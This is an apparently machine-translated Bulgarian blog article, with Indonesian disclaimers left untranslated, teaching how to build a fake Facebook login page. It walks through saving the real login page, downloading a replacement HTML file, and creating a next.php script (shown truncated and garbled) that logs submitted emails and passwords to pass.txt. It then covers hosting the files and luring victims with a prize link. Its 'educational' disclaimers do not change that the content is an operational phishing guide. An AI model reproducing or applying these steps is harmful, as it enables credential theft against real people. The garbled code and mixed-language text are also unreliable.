как да хакна най-новия fb script 2020, 100% работи!

Изтеглете най-новия FB хак скрипт 2020, за да създадете фалшив вход с HTML код за FB. Вижте подробностите тук!

Сценарият за хакване на FB е форма на киберпрестъпления, която напоследък нараства в социалните медии. Следователно трябва да бъдете по-внимателни при запазването на личните си данни във вашия Facebook акаунт.

Всъщност този акаунт в социалните медии, направен от Марк Зукърбърг , многократно твърди, че системата за сигурност е много сложна.

С толкова много потребителски данни, разбира се, има хора със злонамерени намерения да откраднат данни във Facebook.

Един от тях е да се използва FB хак скрипт, за да се създаде фалшив псевдоним за влизане фалшив вход . Така че, за да не бъдете измамени, нека се научим как да получим FB фишинг скрипт като следния!

2020 FB Фишинг скрипт

Има много начини, които киберпрестъпниците използват, за да извършват своите действия, един от които е чрез изтегляне на връзката към скрипт за фишинг на FB хак. За повече информация, моля, прочетете обяснението по-долу!

Запознайте се с фалшива техника за влизане , как да проникна FB с HTML скрипт / код!

Източник на снимки: guidepedia.info (Можете да тествате този фалшив урок за влизане с този FB хак скрипт с приятели, за да тествате тяхната прозорливост, банда.)

Методът на хакерство , като създава HTML код за FB и създава фалшива страница за вход , е синоним на фишинг хакерски техники, които са популярни сред хакерите .

Чрез използването на фалшив Facebook вход страница , данните си под формата на електронна поща и парола ще се съхраняват на по хакер е домакин и може да разбира бъде поета лесно.

Сега разбирате за опасностите, нали? Така че този път ApkVenue ще ви научи как да създадете HTML хак FB скрипт, който обикновено се използва за този метод.

DISCLAIMER:


Cara hack Facebook dengan script hack FB login palsu yang akan dibagikan di bawah ini hanya bersifat sebagai edukasi untuk langkah preventif guna mencegah hal ini terjadi padamu, geng.

Как да хаквам Facebook с най- новия FB Hack Script 2020

Преди да следвате този урок, имате нужда от хостинг или уеб хостинг, за да можете да качите FB хак скрипта, който сте модифицирали и сте използвали за прихващане на жертвата.

Ако го нямате, ApkVenue разполага и с някои от най -добрите препоръки за безплатен уеб хостинг, които могат да бъдат използвани в подкрепа на стъпките по-долу. Хайде, гледайте!

Стъпка 1 - Запазете страницата за влизане във Facebook

 • Първият път, когато трябва да запазите страницата за вход във Facebook ( //www.facebook.com/login.php/ ), която можете да отворите в Google Chrome.
 • За да я спаси, всичко, което трябва да направите е да щракнете с десния бутон и изберете Запиши като ... опция .

Стъпка 2 - Изтеглете Facebook Hack Script

 • Резултатите от самото изтегляне ще бъдат файл "Login Facebook _ Facebook.html" и папка "Log in to Facebook _ Facebook_files" .
 • Тук просто трябва да изтеглите FB хак скрипта, наречен "Enter Facebook _ Facebook.html", който можете да изтеглите по-долу и да презапишете предишния файл, като го поставите в същата папка.

Изтеглете тук: FB Hack Script за фалшив вход

Стъпка 3 - Създайте допълнителен Facebook скрипт

 • След това можете да създадете допълнителен скрипт под формата на файл, наречен next.php . Просто трябва да копирате и поставите скрипта за хакване на FB по-долу в Notepad и да го запазите с името next.php.

$value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>

Стъпка 4 - Създайте скрипт за парола във Facebook

 • Не забравяйте, че се нуждаете и от празен файл на Notepad с име pass.txt . Самият този файл е полезен за съхранение на имейли и пароли във Facebook от измамени жертви.

Стъпка 5 - Качете FB Hack Script на хостинг

 • Както споменахме по-горе ApkVenue, трябва да качите всички Facebook файлове и скриптове в услугата за хостинг на файлове , която сте създали.
 • Съдържанието на файла, който трябва да бъде качен, са папката "Enter Facebook _ Facebook_files" , файлът "Enter Facebook _ Facebook.html", който е изтеглен по-рано , next.php и pass.txt, както следва.

Стъпка 6 - Разпространете фалшивата връзка за влизане във Facebook

 • Ако сте изпълнили всички стъпки по-горе, сега просто трябва да споделите фалшивата връзка за вход във Facebook, която сте създали по-рано.
 • Можете просто да го направите с уводно изречение, което съдържа примамката просто да вземете награда, въоръжена с Facebook вход .

Стъпка 7 - Имейл и парола Facebook Успешно Di- Hack

 • Ако FB хакерският скрипт, който сте създали по-рано, е работил, файлът pass.txt ще запише имейла и паролата на жертвата във Facebook, резултатите ще бъдат както по-долу, банда.

DISCLAIMER:


Jaka tidak menjadi penerapan script hack FB bakal berhasil 100% walapun kamu mengikuti langkah-langkah di atas. Pasalnya Facebook terus meng-update sistem keamanannya untuk mencegah celah peretasan, geng.

Е, това е поглед към това как да изтеглите и използвате FB хак скрипт, който можете да практикувате сами. След като разберете, разбира се, трябва да сте по-внимателни, нали?

Затова никога небрежно влизайте в дадена страница, без първо да обръщате внимание на URL адреса. Успех и надявам се полезен!

Прочетете също статии за Facebook или други интересни статии от JalanTikus .